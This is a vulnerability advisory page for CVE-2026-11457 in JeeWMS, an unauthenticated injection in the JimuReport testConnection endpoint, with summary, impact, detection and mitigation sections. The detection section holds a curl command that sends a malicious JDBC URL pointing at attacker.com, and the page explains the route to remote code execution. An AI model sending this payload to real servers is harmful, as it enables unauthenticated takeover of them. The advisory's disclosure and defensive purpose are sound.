CVE-2026-11457
Deferred Deferred - Pending Action

JeeWMS JimuReport Test-Connection Endpoint Injection

Publication date: 2026-06-07

Last updated on: 2026-06-07

Assigner: VulDB

Description
A security flaw has been discovered in erzhongxmu JeeWMS up to 141740afb2ba14d441c82a833d0a418d07ca2d69. This vulnerability affects unknown code of the file /base-boot/jmreport/testConnection of the component JimuReport test-connection Endpoint. Performing a manipulation of the argument dbType/dbDriver/dbUrl/dbUsername/dbPassword results in injection. Remote exploitation of the attack is possible. The exploit has been released to the public and may be used for attacks. This product follows a rolling release approach for continuous delivery, so version details for affected or updated releases are not provided. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Scores

EPSS Scores

Probability:
Percentile:

Meta Information

Published
2026-06-07
Last Modified
2026-06-07
Generated
2026-06-28
AI Q&A
2026-06-07
EPSS Evaluated
2026-06-26
NVD
CVE-2026-11457
EUVD
EUVD-2026-34987

Affected Vendors & Products

Currently, no data is known.

Helpful Resources

Exploitability

CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-74 The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component.
CWE-707 The product does not ensure or incorrectly ensures that structured messages or data are well-formed and that certain security properties are met before being read from an upstream component or sent to a downstream component.

Attack-Flow Graph

AI Quick Actions

Instant insights powered by AI
Executive Summary

This vulnerability exists in erzhongxmu JeeWMS in the JimuReport test-connection endpoint located at /base-boot/jmreport/testConnection. It allows an attacker to manipulate database connection parameters such as dbType, dbDriver, dbUrl, dbUsername, and dbPassword to perform injection attacks.

Specifically, the endpoint accepts attacker-controlled JDBC parameters without requiring authentication. By providing a malicious PostgreSQL JDBC URL with parameters like socketFactory and socketFactoryArg, an attacker can trigger arbitrary class instantiation through the Spring framework. This can lead to loading a remote Spring XML file controlled by the attacker, enabling execution of arbitrary commands on the server.

The endpoint is accessible without authentication because it is marked as anonymous in the Shiro security configuration, making remote exploitation possible and allowing full server compromise in some cases.

Impact Analysis

This vulnerability can have severe impacts including unauthorized remote code execution on the server running JeeWMS. An attacker can execute arbitrary commands, potentially gaining full control over the server.

Even if full remote code execution is not achieved, the flaw allows critical unauthenticated JDBC abuse such as arbitrary class instantiation and outbound network requests, which can be leveraged for further attacks.

Because the vulnerable endpoint does not require authentication, attackers can exploit it remotely without any credentials, increasing the risk and ease of attack.

Detection Guidance

This vulnerability can be detected by testing the accessibility and behavior of the `/base-boot/jmreport/testConnection` endpoint on the target system. Since the endpoint accepts unauthenticated JDBC parameters, you can attempt to send crafted HTTP requests with malicious JDBC URLs to observe if the system processes them.

For detection, you can use tools like curl or any HTTP client to send requests to the endpoint with parameters such as dbType, dbDriver, dbUrl, dbUsername, and dbPassword. For example, sending a request with a PostgreSQL JDBC URL containing parameters like `socketFactory` and `socketFactoryArg` can help verify if the endpoint is vulnerable.

  • curl -X POST "http://target-system/base-boot/jmreport/testConnection" -d "dbType=postgresql&dbDriver=org.postgresql.Driver&dbUrl=jdbc:postgresql://attacker.com:5432/db?socketFactory=attacker.Class&socketFactoryArg=arg&dbUsername=user&dbPassword=pass"

If the server responds without authentication and processes the request, it indicates the endpoint is accessible and potentially vulnerable to injection and remote code execution.

Mitigation Strategies

Immediate mitigation steps include restricting access to the `/base-boot/jmreport/testConnection` endpoint to trusted users only, ideally requiring authentication and authorization.

Since the vulnerability arises because the endpoint is marked as anonymous in the Shiro configuration, updating the security configuration to require valid authentication tokens for accessing `/jmreport/**` endpoints is critical.

Additionally, consider disabling or removing the testConnection endpoint if it is not necessary in production environments.

Monitor network traffic for suspicious outbound connections or unusual activity originating from the application server, as exploitation involves loading remote resources.

Compliance Impact

This vulnerability allows unauthenticated remote code execution and arbitrary command execution on the affected system, potentially leading to unauthorized access to sensitive data.

Such unauthorized access and potential data breaches can negatively impact compliance with data protection regulations like GDPR and HIPAA, which require safeguarding personal and sensitive information against unauthorized access and ensuring system integrity.

Because the vulnerability enables full server compromise without authentication, it increases the risk of data exposure, manipulation, or loss, which are critical compliance concerns under these standards.

Chat Assistant

Ask questions about this CVE
Hi! I’m here to help you understand CVE-2026-11457. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70

EPSS Chart